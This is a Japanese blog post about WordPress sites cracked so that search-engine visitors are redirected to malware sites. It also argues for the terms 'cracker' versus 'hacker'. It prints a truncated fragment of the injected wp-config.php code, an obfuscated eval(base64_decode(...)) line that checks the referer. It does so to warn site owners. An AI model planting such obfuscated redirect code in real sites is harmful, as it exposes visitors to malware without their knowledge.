定期的に自サイトが検索結果にどう表示されているか確認しよう | YMO「FIRECRACKER」

公開日： 2013/09/13 : SEO

アイキャッチ画像には特に意味はない。
っていうかほんのちょっとだけ意味はあるのだが、まあ、ホントにどうでもいいので今回はあえてスルーする。

ロリポップでのクラッカーによる大規模クラッキングがあった。
それだけではなく、WordPressのサイトのクラッキングが相次いでいる。

早速冒頭からズレてしまうのだが、コンピューター犯罪を行うことをハッキング、そのようなことをする人をハッカーと呼ぶ風潮があるが、これに対してはイカンなあと思っている。
本来は、コンピューター犯罪は「クラッキング」、そういう行為をする人は「クラッカー」というのだ。

「ハック」(Hack)という言葉は本来卓越した技術・技能によってコンピュータを使いこなすことを指す。
「ハッカー」（Hacker）とは、卓越した技術によって尊敬されるコンピューターのエンジニアのことだ。

しかし、技術を悪用してコンピューター犯罪を行う人を指す言葉になってしまった。

自分が達した剣の技の高みを試したくて夜な夜な辻斬りを行う人のことを、「剣豪」と呼ばれる様になってしまったような違和感である。

それと、もう一つ違和感を感じることがある。

技術が全然なくても、クラッキングツールを使ってクラッキングするだけの人もハッカーと呼ばれる。
本来はこれは「スクリプトキディ」と呼ばれるべきものだ。
キディというのは子供というより「ガキ」で、ツールを使うしか能がないガキっていうぐらいの意味。

先ほどの「剣豪」の例で言えば、更に意味がズレてしまった感じだ。
剣の修業もしたことがない人が通り魔的に人を殺すという事件が増えて、そんな通り魔も「剣豪」って呼ばれるようになってしまったということだ。

O’Reillyのように正しく用語を広めようとしている出版社もあるが、

Googleまでが、
マルウェアとハッキングされたサイトについて
という表現を使っているのは非常に残念だ。

そんな風潮にすこーーーしでも棹さしてみたい。
是非皆さん、クラッカーとハッカーを分けるようにしてみてください。

さて、やっと本題に入る。

WordPressサイトのクラッキングが増えている。
私が最近相次いて経験した例について話をしてみるのだ。

一見普通にアクセスできる。

しかし、検索結果に表示された自サイトをクリックすると、全く違ったサイトに飛ばされてしまうというケースだ。

wp-config.phpを書き換えられてしまって、

eval（base64_decode（“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cig・・・・以下略”））;

こんな感じで書き換えられてしまったのである。
その飛び先がマルウェアの配布サイト。

WordPressの脆弱性を狙ったPHPコード不正書き換えについて

まさしくこれと同じである。
これが怖いのは、検索結果をクリックしないとわからないことだ。
（でも、要注意、自分のパソコンをクラッキングされてしまうかもしれない。）
なので、自分の管理下のサイトについては検索結果を定期的にチェックをしてやる必要があるということである。